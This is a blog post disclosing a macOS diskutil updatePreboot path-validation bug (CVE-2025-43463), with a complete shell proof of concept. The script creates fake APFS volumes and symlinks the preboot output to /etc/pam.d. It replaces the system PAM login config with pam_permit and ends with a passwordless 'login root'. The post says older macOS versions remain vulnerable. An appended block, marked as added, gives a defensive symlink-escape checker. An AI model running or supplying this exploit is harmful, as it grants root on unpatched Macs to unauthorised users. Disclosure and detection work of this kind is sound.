amy's website

StorageKit bug 2

After this was fixed, I found a nearly identical bug in diskutil apfs updatePreboot. I reported it in September 2025, and it was fixed in macOS 26.1:

Impact: An app may be able to access sensitive user data
Description: A parsing issue in the handling of directory paths was addressed with improved path validation.
CVE-2025-43463: Amy (@asentientbot), Mickey Jin (@patch1t)

Unfortunately (for me), Mickey Jin found it first! So I didn't get a bounty.

Sequoia and older are still vulnerable.

sample code

As before, it will log in as root.

whole=$(hdiutil attach -nomount -plist ram://10000000 | plutil -extract system-entities.0.dev-entry raw -)
diskutil apfs createcontainer $whole
container=$(diskutil info -plist $whole | plutil -extract APFSContainerReference raw -)
diskutil apfs addvolume $container APFS evil_data -role D
diskutil apfs addvolume $container APFS evil_system -role S -sibling evil_data
diskutil apfs addvolume $container APFS evil_preboot -role B

bugInput=/Volumes/evil_system/usr/standalone/i386/EfiLoginUI
bugOutput=/Volumes/evil_preboot/$(diskutil info -plist evil_system | plutil -extract VolumeUUID raw -)/usr/standalone/i386/EfiLoginUI
mkdir -p $bugInput
mkdir -p $(dirname $bugOutput)

echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > $bugInput/login
ln -s /etc/pam.d "$bugOutput"

diskutil apfs updatepreboot evil_system

login root
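
The sample code above places a symlink to /etc/pam.d at the destination path on the preboot volume. As an added example that is not part of the original post, the following check lists symlinks under a mounted volume whose targets resolve outside that volume. The function names, the placeholder UUID directory and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Lists symlinks under a directory
# tree (for instance a mounted volume) whose targets resolve outside that tree.
# Assumes file names without embedded newlines.

find_escaping_symlinks() {
    # Physical path of the tree root, so prefix comparisons are reliable.
    root=$(cd -P -- "$1" 2>/dev/null && pwd -P) || return 2
    find "$root" -type l | while IFS= read -r link; do
        target=$(readlink "$link")
        base=$(dirname "$link")
        if [ -d "$link" ]; then
            # Target is a directory: resolve it fully.
            resolved=$(cd -- "$base" 2>/dev/null &&
                cd -P -- "$target" 2>/dev/null && pwd -P) || resolved=
        else
            # File or dangling target: resolve the directory that would hold it.
            resolved=$(cd -- "$base" 2>/dev/null &&
                cd -P -- "$(dirname "$target")" 2>/dev/null && pwd -P) || resolved=
        fi
        case "$resolved/" in
            "$root"/*) ;;                                # stays inside the tree
            *) printf '%s -> %s\n' "$link" "$target" ;;  # escapes or unresolvable
        esac
    done
}

# Constructed sample tree mirroring the directory layout used in the post.
# The UUID directory name is a placeholder.
build_sample_tree() {
    t=$(mktemp -d) || return 1
    d="$t/VOLUME-UUID-PLACEHOLDER/usr/standalone/i386"
    mkdir -p "$d/real"
    : > "$d/real/file"
    ln -s real/file "$d/inside_file"     # relative, stays inside
    ln -s ../i386/real "$d/inside_dir"   # relative with "..", still inside
    ln -s /etc/pam.d "$d/EfiLoginUI"     # absolute, outside the tree
    ln -s ../../../../.. "$d/climb"      # relative, climbs above the root
    printf '%s\n' "$t"
}
```

Run it as `find_escaping_symlinks /Volumes/<name>` against a mounted volume; every line printed is a link that a process copying into that path without symlink checks would follow out of the volume.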